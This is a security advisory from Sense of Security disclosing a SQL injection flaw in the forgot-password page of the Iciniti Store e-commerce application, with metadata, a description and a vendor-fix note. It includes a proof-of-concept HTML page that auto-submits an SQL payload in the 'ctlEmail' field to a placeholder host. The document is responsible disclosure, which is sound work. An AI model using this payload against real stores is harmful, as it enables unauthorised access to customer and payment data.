Sense of Security – Security Advisory – SOS-12-003
Release Date. | 06-Mar-2012 |
Last Update. | – |
Vendor Notification Date. | 28-Jul-2011 |
Product. | Iciniti Store |
Platform. | Windows |
Affected versions. | 4.3.3683.31484 verified, and possibly others |
Severity Rating. | High |
Impact. | Manipulation of data |
Attack Vector. | Remote without authentication |
Solution Status. | Update is available by contacting Iciniti |
CVE reference. | CVE- Not yet assigned |
Details.
Iciniti Store is a web application providing e-commerce and payment solutions. The application suffers from a SQL injection vulnerability in logon_forgot_password.aspx. It fails to validate data supplied in the ‘ctlEmail’ variable before being used in an SQL query.
Proof of Concept.
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action=” http://x.x.x.x/logon_forgot_password.aspx” name=”form”
method=”POST”>
<input type=”text” name=”ctlEmail” value=”SELECT @@VERSION”>
<input type=”text” name=”btnSubmit” value=”Submit”>
</form>
</body>
</html>
Solution.
Update is available by contacting Iciniti.
Discovered by.
Sense of Security Labs.